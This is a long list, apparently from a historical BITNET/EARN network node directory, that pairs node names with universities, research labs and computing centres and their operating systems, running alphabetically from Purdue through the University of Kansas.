+PURVLSI   Purdue U EE VLSI Lab                      VM/SP
+QUCDNEE1  Queen's Electrical Engineering            VMS
+QUCDNTRI  Queen's Electrical Engineering            VMS
+QUCDNEE   Queen's Electrical Engineering            VMS
+QCVAXA    Queens College CUNY                       VMS
+QCVAXB    Queens College CUNY                       VMS
+QCVAXC    Queens College CUNY                       VMS
+QCUNIX    Queens College CUNY                       ULTRIX
+QCVAX     Queens College CUNY                       VMS
+QUCDNCMC  Queens U Can Microelec Corp               VMS
+QUCDNAST  Queens Univ Astronomy                     VMS
+QUCIS     Queens University                         UNIX
+QUCDN     Queens University                         VM/SP
+QUCDNSUR  Queens University Surgery                 VMS
+AWIRAP01  RA-Physik                                 VMS 4 5 LAVC
+AWIRAP02  RA-Physik                                 VMS 4 5 LAVC
+DACTH51   Rechenzentrum der RWTH Aachen             VMS
+DKAUNI11  Rechenzentrum U Karlsruhe                 IBM VM/SP R4
+DKAUNI46  Rechenzentrum U Karlsruhe                 SIEMENS BS3000 MSP 20
+DKAUNI48  Rechenzentrum U Karlsruhe                 SIEMENS BS3000 MSP 20
+REED      Reed College                              BERKELEY UNIX
+RCN       Regents Computer Network                  NOS
+IRTCORK   Regional Tech College Cork                VM/IS
+GREARN    Research Ctr of Crete                     VM/SP
+RLG       Research Libraries Grp                    MVS/SP
+RHODES    Rhodes College CC                         VMS
+DKLUNI01  RHRK Kaiserslautern                       SIEMENS BS3000 MSP
+DKLUNI85  RHRK Kaiserslautern, Germany              SIEMENS BS2000
+DKLUNI86  RHRK Kaiserslautern, Germany              SIEMENS BS2000
+DBNUZR1A  RHRZ Uni Bonn, Germany                    IBM VM/SP HPO R4.2
+RICECSVM  Rice U Comp Sci Dept.                     VM/SP
+RICE      Rice Univ ICSA                            VM/SP
+ITORIPTO  Ricerch e Progetti Torino                 VM/SP
+BGERUG51  Rijks Univ                                VMS
+HLERUL52  Rijksuniver Leiden Gorl Lab               VMS 4 1
+RITVM     RITISC                                    VM/SP HPO
+RITVAXA   Rochester Inst of Tech                    VMS
+RITVAXB   Rochester Inst of Tech                    VMS
+RITVAXC   Rochester Inst of Tech                    VMS
+RITVAXD   Rochester Inst of Tech                    VMS
+RITVAXN   Rochester Inst of Tech                    VMS
+RITVAX    Rochester Inst of Tech                    VMS
+RITVAXO   Rochester Inst of Tech (NTID)             VMS
+RITVAXL   Rochester Inst of Tech.                   VMS
+ROCKVAX   Rockefeller University                    UNIX BSD
+ROHVM1    Rohm & Haas Co                            VM/HPO
+RHIT      Rose-Hulman Inst.                         VMS
+RMC       Royal Military College                    CP-6
+RPICMPVM  RPI Ctr Mfg Prod                          VM/SP
+RPICICGD  RPI Graphics Center                       VM/SP
+RPICICGE  RPI Graphics Center                       VM/SP
+RPITSMTS  RPI Info Tech Srvs                        MTS/XA DIST 5.1C
+RPITSGW   RPI Info Tech Srvs                        UTX
+DHVRRZN0  RRZN, Univ Hannover, Germany              CDC NOS
+DHVRRZN1  RRZN, Univ Hannover, Germany              IBM VM/SP R4 0
+BANRUC01  RUCA, Antwerpen, Belgium                  NOS 2 5
+DBORUB01  Ruhr-Univ Bochum                          CDC NOS/VE
+NORUNIX   RUNIT                                     ULTRIX 2 0
+RUTHEP    Rutgers U High Energy Physics             VMS
+DRACO     Rutgers Univ CCIS                         VMS
+RUTGERS9  Rutgers Univ CCIS MVS                     MVS/SP
+CANCER    Rutgers Univ CCIS VAX                     VMS
+ZODIAC    Rutgers Univ CCIS Vax Clust               VMS
+RUTVM1    Rutgers Univ CCIS VM1                     VM/SP
+BIOVAX    Rutgers Univ Molecular Bio Comp Lab       VMS
+DACTH01   RWTH Aachen, Germany                      CDC NOS 2 4
+RYERSON   Ryerson                                   VM/SP
+DWUUNI21  RZ Uni Wuerzburg, Germany                 IBM MVS 3 8
+YUBGSS21  RZS SR Srbije, Yugoslavia                 IBM MVS/SP 1 3.8
+SERVAX    S Reg Data Ctr                            VMS
+SER       S Reg Data Ctr Tamiami Campus             OS 1100
+SLUVCA    Saint Louis Univ                          VMS
+SALK      Salk Instit                               VMS
+SHSUTHOR  Sam Houston State Univ                    VMS
+SHSU      Sam Houston State Univ                    VMS
+SHSUODIN  Sam Houston State Univ                    VMS
+SAMFORD   Samford Univ                              VM/SP
+SDSC      San Diego Supercomputer Ctr               VMS
+SCU       Santa Clara Univ                          VMS
+HASARA11  SARA Amsterdam, Netherlands               VM/SP R4
+JPNSUT50  Scienc U Tokyo Y J Coll                   VM/SP
+JPNSUT00  Science U of Tokyo                        VM/SP
+JPNSUT40  Science U of Tokyo                        VM/SP
+JPNSUT31  Science U of Tokyo Noda                   VMS
+JPNSUT10  Science U Tokyo - Japan                   VM/SP
+JPNSUT20  Science U Tokyo - Japan Kagurazaka        VM/SP
+JPNSUT30  Science U Tokyo - Japan, Noda             VM/SP
+JPNSUT3A  Science U Tokyo - Japan, Noda             MUSIC
+JPNSUT01  Science Univ of Tokyo                     VM/SP
+JPNICEPP  Science Univ of Tokyo ICEPP               VM/SP
+BMLSCK11  SCKCEN Mol Belgium                        VM/SP R4
+IPISNSVA  Scuola Normale Superiore                  DEC VMS 4 3
+IPISNSIB  Scuola Normale Superiore                  VM/SP
+SENECA    Seneca College                            VMS
+KRSNUCC1  Seoul Nat'l Univ CC                       VM/HPO
+SETONVM   Seton Hall U CC                           VM/SP
+SETONMUS  Seton Hall Univ CC                        VM/SP
+JPNSNU10  Setsunan Univ                             VM/SP
+JPNSNU20  Setsunan Univ                             VM/SP
+SHERCOL1  Sheridan College                          VMS
+JPNSWU10  Showa Women's Univ                        VM/SP
+IMISIAM3  SIAM IFC, Milano, Italy                   IBM VM/SP HPO 4 0
+IMISIAM2  SIAM IFC, Milano, Italy                   IBM VM/SP HPO 4 0
+SFU       Simon Fraser U Comp Svcs                  MTS
+SFUVM     Simon Fraser U Comp Svcs                  VM/SP
+ITSSISSA  SISSA, Trieste, Italy                     UNIX UTX
+SKIDMORE  Skidmore College                          VMS
+SLACASP   SLAC ASP Experiment                       VMS
+SLACVM    SLAC Computer Center                      VM/SP
+SLACESA   SLAC End Station A                        VMS
+SLACHRS   SLAC High Res Spectrometer                VMS
+SLACMAC   SLAC Magnetic Calorimeter                 VMS
+SLACMKII  SLAC Mark-II Detector                     VMS
+SLACM2    SLAC Mark-II Detector                     VMS
+SLACMK3   SLAC Mark-III Detector Exp                VMS
+SLACPCR   SLAC PCR                                  VMS
+SLACSLC   SLAC SLC                                  VMS
+SLACSLD   SLAC SLD Detector                         VMS
+SLACTBF   SLAC TBF                                  VMS
+SLACTWGM  SLAC TCP/Two-Gamma Experiment             VMS
+SLACUCSD  SLAC TCP/2-Gamma Expt (UCSD)              VMS
+SLACTPCS  SLAC TPC/Two-Gamma Experiment             VMS
+SLACPHYS  SLAC TPC/Two-Gamma Experiment             VMS
+SMITH     Smith College                             VMS
+SIVM      Smithsonian Instit                        VM/SP
+TWNSCU10  Soochow Univ                              VM/SP
+SDSUVM    South Dakota State Univ                   VM/HPO SP
+SEMASSU   Southeastern Mass Univ                    VMS
+SIUCVMB   Southern Illinois U - Carbondale          VM/SP
+SIUEVM    Southern Illinois Univ Edwardsvl          VM/SP
+SMUVM1    Southern Methodist U ACC                  VM/SP
+SMSVMA    Southwest Missouri State Univ             VM/SP
+SMSVMB    Southwest Missouri State Univ             VM/SP
+SMSVAXA   Southwest Missouri State Univ             VMS
+SWTEXAS   Southwest Texas State Univ                VMS
+SWTNYSSA  Southwest Texas State Univ                VMS
+SWTTEGAN  Southwest Texas State Univ                VMS
+STSCI     Space Telescope Science Instit            VMS
+SLCSL     St. Lawrence College                      VM/CMS
+STLAWU    St. Lawrence Univ                         VM/SP
+STMARYS   St. Mary's U                              VMS
+STMARYTX  St. Mary's Univ of San Antonio            VMS
+SMCVAX    St. Michael's Coll                        VMS
+SPCVXA    St. Peter's Co                            VMS
+SESTAK    Stacken, KTH Sweden                       TOPS-10/7
+SSRL750   Stanford Synchrotron Rad Lab              VMS
+STANFORD  Stanford University                       MVS/XA
+SUSOLAR   Stanford University                       UNIX
+SUWATSON  Stanford University                       VM/SP HPO 4.2
+OBERON    Stanford University                       VM/SP HPO 5.0
+MSUS1     State Univ System of Minnesota            VMS
+SFAUSTIN  Stephen F. Austin State Univ              CP-6
+SITVXB    Stevens Inst Tech                         VMS
+SITVXC    Stevens Inst Tech                         VMS
+HASARA5   Stichting Academ Reken Amsterdam          VMS 4
+SEQZ11    Stockholm U Comp Ctr                      IBM VM/SP R4
+SEQZ21    Stockholm U Comp Ctr                      IBM MVS/SP 1 3.1
+SEQZ51    Stockholm U Comp Ctr                      DEC VMS
+SESUF51   Stockholm Univ                            DEC VMS
+QZCOM     Stockholm Univ CC                         TOPS-10/7
+SEQZ01    Stockholm Univ CC                         CDC NOS 2 4.1 LEVEL 642
+SEQZ02    Stockholm Univ CC                         CDC NOS 2 4.1 LEVEL 642
+QZKOM     Stockholm Univ CC                         TOPS-10/7
+DBNISKP5  Strahlen-Kernphysik Uni Bonn              DEC VMS 4 4
+SEGATE    SUNET                                     UNIX BSD4 3
+FRSUN12   SUNIST,                                   IBM VM/SP
+ALBNY1VX  SUNY Albany CC VAX VMS                    VMS
+UBVMSC    SUNY Bflo CC                              VMS
+UBVMSD    SUNY Bflo CC                              VMS
+BINGVAXA  SUNY Binghamton                           VMS
+BINGVAXB  SUNY Binghamton                           VMS
+BINGVAXC  SUNY Binghamton                           VMS
+BINGVMA   SUNY Binghamton                           VM/SP
+BINGVMB   SUNY Binghamton                           VM/SP
+SUNYBING  SUNY Binghamton                           VM/SP
+BINGTJW   SUNY Binghamton Sch of Engr               VM/SP
+SUNYBCS   SUNY Buffalo Comp Sci Dept                UNIX BSD
+SNYCENVM  SUNY Central Admin CC                     VM/SP
+SNYDELBA  SUNY Coll of Technol at Delhi             MCP
+SNYBROBA  SUNY College at Brockport                 MCP
+BROCK1P   SUNY College at Brockport - ACS           PRIMOS
+SNYBUFBA  SUNY College at Buffalo                   MCP 3.6.2
+SNYBUFVA  SUNY College at Buffalo                   VMS
+SNYCANBA  SUNY College at Canton                    MCP
+SNYCOBBA  SUNY College at Cobleskill                MCP
+SNYCORBA  SUNY College at Cortland                  MCP
+SNYFREBA  SUNY College at Fredonia                  MCP
+SNYGENBA  SUNY College at Geneseo                   MCP
+GENESEO   SUNY College at Geneseo                   VMS
+SNYNEWBA  SUNY College at New Paltz                 MCP
+SNYOLDBA  SUNY College at Old Westbury              MCP
+SNYONEBA  SUNY College at Oneonta                   MCP
+SNYOSWBA  SUNY College at Oswego                    MCP
+SNYPLABA  SUNY College at Plattsburgh               MCP
+SNYPLADG  SUNY College at Plattsburgh               AOS/VS
+SNYPOTBA  SUNY College at Potsdam                   MCP
+SNYFARBA  SUNY College Farmingdale                  MCP
+SNYMORBA  SUNY College Morrisville                  MCP
+ADMBROOK  SUNY Health Science Ctr Brooklyn          VM/SP
+SACBROOK  SUNY Health Science Ctr Brooklyn          VM/SP
+SNYBKADM  SUNY Health Science Ctr Brooklyn          VM/SP
+SNYBKSAC  SUNY Health Science Ctr Brooklyn          VM/SP
+SNYALFBA  SUNY of NY College of Tech at Alfred      MCP
+SBBIOVM   SUNY Stony Brook Biol Sci Comp            VM/SP
+SBCCVM    SUNY Stony Brook Comp Ctr                 VM/HPO
+SBCCMAIL  SUNY Stony Brook Comp Ctr Mail            VMS
+SUNYSBNP  SUNY Stony Brook Physics Dept             VMS
+UBVMSA    SUNY/Bflo CC                              VMS
+UBVM      SUNY/Bflo CC                              VM/SP
+UBVMSB    SUNY/Bflo CC                              VMS
+UBVMS     SUNY/Bflo CC                              VMS
+ALBNYMVS  SUNYA EETR MVS                            MVS/JES2
+ALBNYVM1  SUNYA EETR VM                             VM/HPO
+HUTSUR51  SURFnet, Netherlands                      VMS 4 6
+SWATPRM   Swarthmore College                        VMS
+SEARN     Sweden EARN                               IBM VM/SP R4
+SUNSET    Syracuse U                                VMS
+SUNRISE   Syracuse U                                VMS
+SUAIS     Syracuse U AIS                            MVS
+SUCAD1    Syracuse U CAD/CAM                        VMS
+SUHEP     Syracuse U High Energy Phys               VMS
+SUZEUS    Syracuse Univ Comp. Sys.                  VM/SP HPO
+SUVM      Syracuse University                       VM/HPO
+SUMVS     Syracuse University                       MVS
+JPNTAMA0  Tamagawa Univ                             VM/SP
+FINTUTA   Tampere U Tech                            DEC VMS 4 2
+FINTUT    Tampere University of Techn               UNIX 4 3 BSD
+TAMODP    TAMU ODP                                  VMS
+TAMAGEN   TAMU/AG Eng                               VMS
+TAMMVS1   TAMU/CSC                                  MVS/SP
+TAMVM1    TAMU/CSC                                  VM/SP/HPO
+TAMENTO   TAMU/ENTO                                 VMS
+TAMGEOP   TAMU/GEOP                                 VMS
+TARLETON  Tarleton State Univ - DPC                 NOS
+HDETUD2   Tech Hoogeschool Delft                    MVS/SP 1 3.4
+HDETUD5   Tech Hoogeschool Delft                    VMS 4 4
+DB0TUI6   Tech U Berlin Infor KBS                   UNIX 4 2 BSD
+DBSINF6   Tech U Braunschweig Info                  ULTRIX
+DM0TUI1S  Tech U Informatik, Muenchen               IBM VM/SP R5 06
+DDADVS1   Techn Darmstadt Fachber Inform            IBM VM/SP R3
+TUNS      Technical Univ of Nova Scotia             VMS
+TECHCDC   Technion - CDC                            NOS 2.4.3
+TECHMVS   Technion - Haifa                          MVS/SP
+TECHNION  Technion - Haifa                          IBM VM/SP HPO 4 2
+TECHSEL   Technion Dept Math - Haifa                UNIX
+TECHUNIX  Technion Dept of Math                     UNIX BSD 4 3
+TECHDPD   Technion, Haifa                           MVS/JES2
+HENTHT5   Technische Hogeschool Twente              VMS 4 2
+DB0TUI11  Technische U Berlin                       IBM VM/SP
+DB0TUM11  Technische U Berlin Maschinen             IBM VM/SP
+DB0TUZ01  Technische U Berlin Rechenzentrum         NOS
+DB0TUS11  Technische U Berlin Schiffs               IBM VM/SP
+ICSATAXA  Tecnopolis CSATA Novus Ortus              IBM MVS/XA
+TAUNIVM   Tel Aviv U Comp Ctr                       IBM VM/SP HPO R4 2
+TAUNOS    Tel Aviv U Comp Ctr                       CDC NOS 2 5.3
+TAURUS    Tel Aviv U Comp Ctr                       UNIX BSD 4 2
+TAUENG    Tel Aviv U Eng Sch                        DEC VMS 4 2
+TAUPHY    Tel Aviv Univ Nuc Phys                    DEC VMS 3 7
+TAUVE     Tel Aviv University                       CDC NOS/VE 1 2.3
+TEMPLEVM  Temple U Comp Activity                    VM/SP
+TMPLSUPR  Temple U Computer Activity                VM/SP
+TMPLCIS   Temple U Computer Activity                VMS
+TMPLNOS   Temple University Computer Activity       NOS
+TNTECH    Tennessee Tech Univ                       VMS
+TAMCGF    Texas A&M Engineering Graphics            VMS
+TAMCBA    Texas A&M U Acad Comp Ctr                 VM/SP
+TAMBIGRF  Texas A&M U Biochem                       VMS
+TAMCHEM   Texas A&M U Chemistry Dept                VMS
+TAMSTAR   Texas A&M U Comp Srvs Ctr                 VMS
+TAMVENUS  Texas A&M U Comp Srvs Ctr                 VMS
+TAMUNIX   Texas A&M U Computing SC                  UNIX
+TAMLSR    Texas A&M U CS/LSR                        VMS
+TAMTCSL   Texas A&M U EE-TCSL                       VMS
+TAMVXEE   Texas A&M U Electrical Engr               VMS
+TAMNIL    Texas A&M U Learning Tech Ctr             VMS
+TAMMEACA  Texas A&M U ME/CAD                        VMS
+TAMVXRSC  Texas A&M U MML                           VMS
+TAMVXOCN  Texas A&M U Oceanography Dept             VMS
+TAMPHYS   Texas A&M U Physics Dept                  VMS
+TAMCOMP   Texas A&M Univ Cyclotron Inst             VMS
+TAMSIGMA  Texas A&M Univ ECS                        VMS
+TAMLMSB   Texas A&M Univ LMSB                       VMS
+TAMTURBO  Texas A&M Univ TURBO                      VMS
+TCUAVM    Texas Christian Univ                      VM/SP
+TCUAMUS   Texas Christian Univ                      MUSIC/SP
+TCUAVMS   Texas Christian Univ                      VMS
+TCUBVM    Texas Christian Univ                      VM/SP
+TTACS1    Texas Tech U Acad Comp Srvs               VMS
+TTACS2    Texas Tech U Acad Comp Srvs               VMS
+TTUVM1    Texas Tech U Comp Facil                   VM/SP
+TTUHSCVM  Texas Tech U Health Sci Ctr               VM/HPO
+DTUPEV5A  Th Astrophysik Univ Tuebingen             DEC VMS 4 3
+HDETUD1   TH Delft, Netherlands                     VM/SP
+JPNTOHOK  Tohoku Univ                               VM/SP
+JPNTHKVX  Tohoku Univ                               VMS
+JPNTIU01  Tokyo Intern'tl Univ                      VM/SP
+JPNTKUVM  Tokyo Keizai U                            VM/SP
+TOWSONVX  Towson State Univ                         VMS
+TOWSON1   Towson State Univ                         VMS
+TOWSON2   Towson State Univ                         VMS
+TRANSY    Transylvania Univ                         MUSIC/SP
+TRENT     Trent University                          VMS
+TSCVM     Trenton State Co                          VM/SP
+TUCC      Triangle U Comp Ctr                       MVS/SP
+TUCCVM    Triangle U Comp Ctr                       VM/SP
+TUNL      Triangle Univ. Nuclear Lab                VMS
+TRINCC    Trinity College                           VMS
+TRINCC2   Trinity College                           VMS
+TRINITY   Trinity Univ Computing Ctr                VM/SP
+TRIUMFCL  TRIUMF Research                           VMS 4 5
+TRIUMFRG  TRIUMF Research                           VMS 4 5
+TRIUMFER  TRIUMF Research - ERICH                   VMS 4 5
+DB0TUI0   TU Berlin                                 XEXOX
+DB0PTZ1A  TU Berlin                                 VM/SP
+DB0TUI62  TU Berlin Informatik SWT                  UNIX 4 3 BSD
+DBSTU1    TU Braunschweig, RZ, Germany              IBM VM/SP R4 SSI
+DBSNRV0   TU Braynscgweug, NRV-Gateway              XOS
+DCZTU1    TU Clausthal                              VM/SP
+HDETUD53  TU Delft                                  VMS 4 5
+HDETUD52  TU Delft                                  VMS 4 4
+HDETUD51  TU Delft                                  VMS V4 4
+HEITHE5   TU Eindhoven CC, Netherlands              VMS 4 5
+HEITUE51  TU Eindhoven CC, Netherlands              VMS 4 5
+HEITUE1   TU Eindhoven CC, Netherlands              VM/SP
+HEIIPO5   TU Eindhoven IPO, Netherlands             VMS 4 5
+DGATUM5P  TU Muenchen Physik                        VMS
+DB0TUI66  TUB Informatik ISTI                       UNIX 4 2 BSD
+TUFTS     Tufts U                                   VMS
+TULIPS    Tufts Univ                                VMS
+TCSVM     Tulane U Comp Svcs - VM                   VM/SP
+TCSMUSA   Tulane U Comp Svcs Music A                MUSIC
+TCSMVS    Tulane U Comp Svcs MVS                    MVS/SP
+AKRON     U Akron                                   MVS/XA 2 1.7
+AKRONVM   U Akron                                   VM/SP HPO 5
+AKRONVAX  U Akron                                   ULTRIX
+UABCMC    U Alabama B'ham - CMC                     VMS
+UABTUCC   U Alabama Birmingham                      MVS/SP
+UABCVSR   U Alabama Birmingham                      VM/IS
+UA1VM     U Alabama Comp Ctr                        VM/SP HPO
+UALTAMTS  U Alberta Comp Svcs MTS                   MTS
+UALTAVM   U Alberta Comp Svcs VM                    VM/SP
+EMDUAM11  U Autonoma Madrid Ctr Calc                VM/SP
+EB0UB012  U Barcelona Ctr Calculo                   VM/SP
+DBNVB12   U Bonn Chemische Inst                     IBM VM/SP R3 1
+DBNUAMA1  U Bonn Inst Mathematik                    IBM VM/SP R4
+DBNRHRZ1  U Bonn Reg Hochschul                      IBM VM/SP R5
+DBNRHRZ2  U Bonn Reg Hochschulrechenzent            MVS/SP
+UCIPPRO   U CA Irvine, Publ Policy Rsrch            VM/SP
+UCSFBCL   U CA San Fran Biochem Lab
+UCSFC255  U CA San Fran Clin Lab
+UCSFCCB   U CA San Fran Comp Ctr
+UCSFCGL   U CA San Fran Comp Grap Lab
+UCSFVIVO  U CA San Fran Infect Lab
+UCSFMIS   U CA San Fran Med Info Sci
+UCSFNMR   U CA San Fran Nuc Mag Reson Lab
+UNCAACTC  U Calgary A C.T. Centre                   MULTICS
+UCDASVM1  U Calgary Dept Admin Servs                VM/SP
+UCBEAR    U Calif Berkeley                          UNIX BSD
+UCBDOROT  U Calif Berkeley                          UNIX BSD
+UCBERNIE  U Calif Berkeley                          UNIX BSD
+UCBEROS   U Calif Berkeley                          UNIX BSD
+UCBBACH   U Calif Berkeley                          UNIX BSD
+UCBAMBER  U Calif Berkeley                          UNIX BSD
+UCBARPA   U Calif Berkeley                          UNIX BSD
+UCBDEAN   U Calif Berkeley                          UNIX BSD
+UCBDEGAS  U Calif Berkeley                          UNIX BSD
+UCBBERYL  U Calif Berkeley                          UNIX BSD
+UCBBIZET  U Calif Berkeley                          UNIX BSD
+UCBBRAHM  U Calif Berkeley                          UNIX BSD
+UCBBUDDY  U Calif Berkeley                          UNIX BSD
+UCBCAD    U Calif Berkeley                          UNIX BSD
+UCBCALDE  U Calif Berkeley                          UNIX BSD
+UCBCARTA  U Calif Berkeley                          UNIX BSD
+UCBCEVAX  U Calif Berkeley                          UNIX BSD
+UCBCORAL  U Calif Berkeley                          UNIX BSD
+UCBCMSA   U Calif Berkeley                          VM/SP HPO
+UCBCOGSC  U Calif Berkeley                          UNIX BSD
+UCBCORY   U Calif Berkeley                          UNIX BSD
+UCBDALI   U Calif Berkeley                          UNIX BSD
+UCBEAST   U Calif Berkeley                          UNIX BSD
+UCBESVAX  U Calif Berkeley                          UNIX BSD
+UCBDAVIN  U Calif Berkeley                          UNIX BSD
+UCBEULER  U Calif Berkeley                          UNIX BSD
+UCBFRANN  U Calif Berkeley                          UNIX BSD
+UCBGARNE  U Calif Berkeley                          UNIX BSD
+UCBHOLDE  U Calif Berkeley                          UNIX BSD
+UCBIC     U Calif Berkeley                          UNIX BSD
+UCBICW    U Calif Berkeley                          UNIX BSD
+UCBINGRE  U Calif Berkeley                          UNIX BSD
+UCBJASON  U Calif Berkeley                          UNIX BSD
+UCBJASPE  U Calif Berkeley                          UNIX BSD
+UCBJI     U Calif Berkeley                          UNIX BSD
+UCBKEPLE  U Calif Berkeley                          UNIX BSD
+UCBKIM    U Calif Berkeley                          UNIX BSD
+UCBLAPIS  U Calif Berkeley                          UNIX BSD
+UCBLILAC  U Calif Berkeley                          UNIX BSD
+UCBMATIS  U Calif Berkeley                          UNIX BSD
+UCBMAXWE  U Calif Berkeley                          UNIX BSD
+UCBMEDEA  U Calif Berkeley                          UNIX BSD
+UCBMERLI  U Calif Berkeley                          UNIX BSD
+UCBMIRO   U Calif Berkeley                          UNIX BSD
+UCBMONET  U Calif Berkeley                          UNIX BSD
+UCBNEWTO  U Calif Berkeley                          UNIX BSD
+UCBOKEEF  U Calif Berkeley                          UNIX BSD
+UCBOZ     U Calif Berkeley                          UNIX BSD
+UCBPEARL  U Calif Berkeley                          UNIX BSD
+UCBQAL    U Calif Berkeley                          MV 8000 AOS
+UCBRENOI  U Calif Berkeley                          UNIX BSD
+UCBROSE   U Calif Berkeley                          UNIX BSD
+UCBSEYMO  U Calif Berkeley                          UNIX BSD
+UCBSHADO  U Calif Berkeley                          UNIX BSD
+UCBSIM    U Calif Berkeley                          UNIX BSD
+UCBSRC    U Calif Berkeley                          UNIX BSD
+UCBSYLVI  U Calif Berkeley                          UNIX BSD
+UCBTOPAZ  U Calif Berkeley                          UNIX BSD
+UCBTULIP  U Calif Berkeley                          UNIX BSD
+UCBUGS    U Calif Berkeley                          UNIX BSD
+UCBUNIXS  U Calif Berkeley                          UNIX BSD
+UCBVANGO  U Calif Berkeley                          UNIX BSD
+UCBVAX    U Calif Berkeley                          UNIX BSD
+UCBVIOLE  U Calif Berkeley                          UNIX BSD
+UCBWEYL   U Calif Berkeley                          UNIX BSD
+UCBZOOEY  U Calif Berkeley                          UNIX BSD
+UCBCED    U Calif Berkeley                          SUN UNIX
+UCBSOE    U Calif Berkeley                          SUN UNIX
+UCBSSL    U Calif Berkeley                          UNIX
+UCBBKYAS  U Calif Berkeley                          VMS
+UCBCCHEM  U Calif Berkeley                          ULTRIX
+UCBJADE   U Calif Berkeley Campus                   UNIX BSD
+UCBJANUS  U Calif Berkeley Campus                   ULTIX
+UCIVMSA   U Calif Irvine Comp Ctr                   VMS
+UCIVMSC   U Calif Irvine Comp Ctr                   VMS
+UCLATMOS  U Calif LA UCLA Atmos Science             VM/SP
+UCLAVM    U Calif Los Angeles Acad Comp             VM/SP
+UCLAMVS   U Calif Los Angeles Acad Comp             MVS/SP
+UCLAVMB   U Calif Los Angeles Acad Comp             VM/XA SF
+UCLASSCF  U Calif Los Angeles Soc Sci Facil         VM/SP
+UCRVMS    U Calif Riverside Acad Comp Ctr           VMS
+UCRPHYS   U Calif Riverside Phys Dept               VMS
+UCSFCCA   U Calif San Fran Comp Ctr                 UNIX BSD
+UCSFHC    U Calif San Fran Hosp & Clinics           VM/SP
+UCSFVM    U Calif San Francisco                     VM/SP
+SBHEP     U Calif Santa Barbara                     VMS
+UCSBVM    U Calif Santa Barbara Comp Ctr            VM/SP
+UCSBUXA   U Calif Santa Barbara Comp Ctr            BSD UNIX
+UCSBUXB   U Calif Santa Barbara Comp Ctr            BSD UNIX
+UCSCMVS   U Calif Santa Cruz CATS IBM (MVS)         MVS/XA
+UCSCHU    U Calif Santa Cruz H&A                    UNIX BSD
+UCSCLICK  U Calif Santa Cruz Lick Obs               UNIX
+UCSCA     U Calif Santa Cruz Unix A                 UNIX BSD
+UCSCC     U Calif Santa Cruz Unix C                 UNIX BSD
+UCSCD     U Calif Santa Cruz Unix D                 UNIX BSD
+UCSCE     U Calif Santa Cruz Unix E                 UNIX BSD
+UCSCF     U Calif Santa Cruz Unix F                 UNIX BSD
+UCSCG     U Calif Santa Cruz Unix G                 UNIX BSD
+UCSCH     U Calif Santa Cruz Unix H                 UNIX BSD
+UCSCI     U Calif Santa Cruz Unix I                 UNIX BSD
+UCSCJ     U Calif Santa Cruz Unix J                 UNIX BSD
+UCSCK     U Calif Santa Cruz Unix K                 UNIX BSD
+UCSCL     U Calif Santa Cruz Unix L                 UNIX BSD
+UCSCM     U Calif Santa Cruz Unix M                 UNIX BSD
+UCSCVM    U Calif Santa Cruz VM                     VM/SP
+PORTAL    U Calif Santa Cruz VM                     VMS
+UCSCO     U Calif Santa Cruz VM                     SUN OS
+UCCVMA    U Calif System-wide Admin                 VM/HPO
+UCICP6    U California Comptng Fac                  CP6
+BUCLLN11  U Cath Louvain                            VM/SP HPO R4 2
+UCF1VM    U Central Florida                         VM/SP
+UCFCS     U Central Florida Comp Sci Dept           UNIX BSD
+UCHIMVS1  U Chicago Computation Ctr                 MVS/SP
+UCHISTEM  U Chicago Crewe Laboratory                VM/SP
+UCCCMVS   U Cincinnati                              MVS/SP
+UCCCVM1   U Cincinnati                              VM/SP
+IRUCCIBM  U College Cork                            VM/SP
+IRLEARN   U College Dublin                          VM/HPO RELEASE 4 2
+COLORADO  U Colorado Boulder Comp Svcs              VMS
+COLOPHYS  U Colorado Boulder Physics                VMS
+UCONNMVS  U Connecticut                             MVS
+UCONNVM   U Connecticut                             VM/SP HPO
+DKUCCC11  U Copenhagen Comp Ctr                     IBM VM/SP R5
+BMSUEM11  U de l'Etat Belgium                       VM/SP R5
+BLIULG11  U de Liege                                VM/SP HPO R4 2
+BLIULG12  U de Liege                                VM/SP R4
+BLIULG13  U de Liege Belgium                        VM/SP R5
+PTEARN    U de Lisboa                               IBM VM/SP
+IPGUNIV   U degli Studi di Perugia                  IBM VM/SP R3
+UDCVM     U Dist Columbia Comp Ctr                  VM/SP
+UDCVAX    U Dist Columbia VAX                       VMS
+DDOINF6   U Dortmund CC Dept                        UNIX 4 2 BSD
+DERRZE1   U Erlangen                                IBM VM/SP R3
+UFGATE    U Florida CIRCA                           VMS
+UFPINE    U Florida CIRCA                           VMS
+UFENG     U Florida Col Engr                        VM/SP
+UFFSC     U Florida Faculty Sup Ctr                 VM/SP
+CGEUGE52  U Geneva                                  DEC VMS
+HGRRUG0   U Groningen                               NOS
+HGRRUG5   U Groningen                               VMS 4 2
+UOGUELPH  U Guelph VM/CMS                           VM/SP
+UOGVAX2   U Guelph, CIS                             UNIX BSD
+DHVMHH1   U Hannover                                IBM VM/SP R2 01
+UHCCUX    U Hawaii Comp Ctr                         ULTRIX
+UHPLATO   U Hawaii Comp Ctr                         NOS
+UHCCMVS   U Hawaii Comp Ctr, Hon, USA               MVS/SP 1.3.5
+UHCCVM    U Hawaii Comp Ctr, Hon, USA               VM/SP/HPO 4.2
+UHCCVX    U Hawaii Comp Ctr, Hon, USA               VMS
+DHDTRN1   U Heidelberg Immunol Inst                 IBM VM/SP HPO R4 2
+FINUHCB   U Helsinki Phys Comp                      VMS
+UHUPVM1   U Houston Comp Ctr                        VM/SP
+UHNIX1    U Houston Comp Ctr                        ATT
+UHNIX2    U Houston Comp Ctr                        ATT
+UHRCC     U Houston Research Comp Ctr               VMS
+UHRCC2    U Houston Research Comp Ctr 2             VMS
+IDUI1     U Idaho                                   VM/SP
+NCSAVMS   U Ill Ntl Crt Sprcomp Appl                VMS
+NCSAVMSA  U Ill Ntl Ctr Sprcomp Appl                VMS
+NCSAVMSB  U Ill Ntl Ctr Sprcomp Appl                VMS
+UIUCNPL   U Ill- Urb-Champ Nuc Phy Lab              VMS
+UICVM     U Illinois Chicago                        VM/SP
+UICMVS    U Illinois Chicago                        MVS/SP
+UICPHY    U Illinois Chicago                        VMS
+UICVM2    U Illinois Chicago                        VM/SP
+UICVMC    U illinois Chicago AISS/ACC               VM/SP
+UICMVSA   U Illinois Chicago AISS/ACC               MVS/XA 2.1.5
+UIUCMRL   U Illinois Comp Ctr                       VMS
+UIUCHEPA  U Illinois High Energy Physics            VMS
+UIUCHEPB  U Illinois High Energy Physics            VMS
+UIUCVME   U Illinois Urbana-Cham Comp Svcs          VM/SP
+UIAMVS    U Iowa                                    MVS/SP
+UIAECE    U Iowa                                    UNIX BSD
+UIAPRB    U Iowa                                    PRIMOS
+UKANVM    U Kansas Comp Srvs                        VM/SP
